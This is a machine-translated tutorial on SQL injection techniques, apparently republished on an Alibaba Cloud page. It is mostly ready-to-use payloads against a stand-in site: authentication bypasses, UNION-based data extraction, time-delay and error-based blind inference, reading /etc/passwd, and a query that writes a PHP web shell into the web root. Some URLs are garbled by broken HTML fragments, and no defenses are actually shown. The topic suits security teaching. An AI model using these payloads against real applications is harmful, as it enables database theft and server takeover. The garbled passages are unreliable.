SQL injection attacks and defenses

Source: Internet
Author: User
Tags benchmark case statement microsoft sql server

Partial finishing ...

What is SQL injection?

Simple example, for a shopping site, can be allowed to search, price less than a certain value of goods

This value can be entered by the user, for example, 100

But for the user, if input, 1 ' OR ' = ' 1

The result is the resulting SQL,

SELECT *  from Productstbl WHERE < ' 100.00 ' OR ' 1 ' = ' 1 ' ORDER  by ProductDescription;

So that users can get all the product information

Let's look at an example,

For user authentication, you need to enter a user name and password

But if the user injects code into the password,

SELECT userid  from cmsusers WHERE User = ' Foo '  and = ' Password ' OR ' 1 ' = ' 1 ';

This makes it possible to verify

Injection type

inline SQL injection (inline SQL injection)

Inline injection is a query injected with some SQL code, the original query will still be executed all

String inline injection

Example

With the following SQL, all passwords in the users table are updated to New_password, which is quite serious

UPDATEUsersSETPassword= 'New_password'WHEREUsername= 'Bob'  andPassword= 'Old_password' OR '1'='1'

numeric values Inline injection

Note that you do not need to add the opening and closing single quote delimiters when injecting numbers.

SELECT *  from Messages WHERE uid=1=1  /*  */ORDER by received;

Because the 1=1 condition (or) is injected, the database returns all rows in the message table, not just the rows sent to a user

End-of-SQL injection

Terminating SQL injection refers to the successful conclusion of the original query statement by commenting out the remainder of the original query statement when injecting the SQL code.

Example

Inject "' or 1=1;--" code

SELECT *  from Administrators WHERE = "' or 1 = 1; -- ' and password = ';

Because of the 1=1 persistent condition, the statement returns all rows in the Administrators table.

SELECT *  from Administrators WHERE = ' Admin ' /* ' and password = ' */ ";

Sometimes you may find that you cannot use double hyphens (-) on certain occasions.
In this case, you can replace the original comment in the SQL statement with a multiline comment (/* */).
This technique requires multiple vulnerable parameters, and you need to understand where these parameters are located in the SQL statement.

Execute multiple statements

SQL Server 6.0 introduces a server-side cursor in its schema, allowing strings containing multiple statements to be executed on the same connection handle.
All SQL Server versions after 6.0 support this feature and allow the following statements to be executed:
SELECT foo from bar; SELECT Foo2 from Bar2;

MySQL also introduced this feature in versions 4.1 and later, but it does not support this feature by default.

To take advantage of this technique, you first need to be able to terminate the first statement so that you can then connect any SQL code.

Example

http//Www.victim.com/Search.php?s=Test'; SELECT'<? php echo Shell_exec($_get["cmd"]);?>'Into OUTFILE'/var/Www/Victim.com/shell.php';--

Time delay

Time delay is a powerful technique, although the Web server can hide errors or data, but must wait for the database to return the results, so you can use it to confirm the existence of SQL injection. This technique is particularly suitable for blinds.

The Microsoft SQL Server server contains a built-in command to introduce delays to the query: WAITFOR delay ' hours:minutes:seconds '.
For example, to send the following request to the victim Web server, the server's response would take approximately 5 seconds:

http://www.victim.com/basket.aspx?uid=; waitfor ' 0:0:5 '; --

The delay in the server response convinced us that we were injecting SQL code into the backend database

The MySQL database does not have a command equivalent to WAITFOR delay, but it can use a function that takes a long time to introduce the delay. The BENCHMARK function is a good choice.

Mysql> SELECT BENCHMARK (10000000,encode (' hello ', ' Mom '));

Injection attack mode

Injection first to determine what the backend is exactly what the database, specifically what version
The blind method depends on whether the Web server will return the back-end error or return value to you.

The basic method is to verify with the different syntax of the database,

For example, for the concatenation of strings, the syntax of each library is different.

Extracting data through UNION statements

By union you can add your own SQL and get more information.

SELECT column-1,column-2,...,column-N from Table-1UNIONSELECT column-1,column-2,...,column-N from Table-2

The limitation of this method is that

? The queries must return exactly the same number of columns.
? The data in the corresponding columns of the statements must is of the same (or at least compatible) types.

How do you ensure that your SQL and original SQL have the same column number and type?

The way is, you can try each one,

http//Www.victim.com/Products.asp?id= A+Union+Select+NULL--http//Www.victim.com/Products.asp?id= A+Union+Select+NULL,NULL--http//Www.victim.com/Products.asp?id= A+Union+Select+NULL,NULL,NULL--

Keep trying until you get an error.

The same is true for types,

http//Www.victim.com/Products.asp?id= A+Union+Select+' Test ',NULL,NULL,NULLhttp://Www.victim.com/Products.asp?id= A+Union+Select+NULL, ' Test ',NULL,NULL

Try to not error, description type matching

Example

For instance, the following URL would retrieve both the name of the current user and the name of the current database:

Http://www.victim.com/products.asp?id=12+union+select+NULL,system_user,db_name (), NULL

Using conditional statements

The conditional syntax for various databases,

Approach 1:time-based

On SQL Server, for instance, one of the first things your might want to know are whether the user performing the queries is The system administrator account, SA.

http://www.victim.com/products.asp?id=12;if+ (system_user= ' sa ') +waitfor+delay+ ' 0:0:5 '--

Approach 2:error-based

Http://www.victim.com/products.asp?id=12/is_srvrolemember (' sysadmin ')

If the following function returns 1, then 12/1 is still equal to 12; If the return 0,12/0 is obviously an exception, then the value of the subsequent function can be inferred

As an example, let's see how we can use a case statement to check, with our E-commerce application, whether the current user Is SA:

http://www.victim.com/products.asp?id=12/(case+when+ (system_user= ' sa ') +then+1+else+0+end)

Approach 3:content-based

Can avoid generating errors,

Http://www.victim.com/products.asp?id=12%2B (case+when+ (system_user+=+ ' sa ') +then+1+else+0+end)

Like the case above,

To change the subject to redundancy

Working with Strings

Http://www.victim.com/search.asp?brand=acme

Equal To,

HTTP://WWW.VICTIM.COM/SEARCH.ASP?BRAND=ACM '%2b ' e or Http://www.victim.com/search.asp?brand=ac '%2b ' m '%2b ' E

Because%2b, Escape is +

is also equivalent to,

Http://www.victim.com/search.asp?brand=ac '%2bchar (109)%2b ' E

This can be injected as follows,

Http://www.victim.com/search.asp?brand=ac '%2bchar (108%2b (case+when+ (system_user+=+ ' sa ') +then +1+else+0+end)% 2 B ' E

Judging by the conditions,

Http://www.victim.com/search.asp?brand=acme

Or

Http://www.victim.com/search.asp?brand=acle

The above attack only gets 1 bits of data, which can be extended to Len's judgment in order to determine Len using a dichotomy

+8) +then+1+else+0+end "href=" http://www.victim.com/products.asp?id=10/(case+when+ (Len (system_user) +>+8) +then +1+else+0+end ">+8" +then+1+else+0+end "href=" http://www.victim.com/products.asp?id=10/(case+when+ (Len (system_ User) +>+8) +then+1+else+0+end ">http://www.victim.com/products.asp?id=10/(case+when+ (Len (system_user) +> +8) +then+1+else+0+end

You can then use the dichotomy to find each char,

+128) +then+1+else+0+end) "href=" http://www.victim.com/products.asp?id=12/(case+when+ (ASCII (substring SYSTEM_USER) +>+128) +then+1+else+0+end ">+128) +then+1+else+0+end)" href= "http://www.victim.com/ products.asp?id=12/(case+when+ (ASCII (substring (select+system_user)) +>+128) +then+1+else+0+end ">http ://www.victim.com/products.asp?id=12/(case+when+ (ASCII (substring (select+system_user),) +>+128) +then+1+ Else+0+end)

Exploiting the operating system

Accessing the file system

Read

The Load_file function also handles binary files transparently, which means, and a little bit of finesse we can use T He function to read binary files from the remote host easily:

Such as

' Union Select Load_file ('/etc/passwd ') #

INSERT INTO Foo set line=load_file ('/tmp/temp.bin ');

Write

AAA ' Union Select NULL, ' SensePost 2008\n ' into DumpFile '/tmp/sp.txt ' #

Executing operating system commands

Exploiting Second-order SQL Injection

The first attack request, just put the attack script, write storage, such as database

The second request, the attack script will be read out from the library, triggering the execution, this will produce a real attack

Finding Second-order Vulnerabilities

Second-order SQL Injection is more difficult to detect than first-order vulnerabilities, because your exploit is submitted In one request and executed in the application ' s handling of a different request.

SQL injection attacks and defenses

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.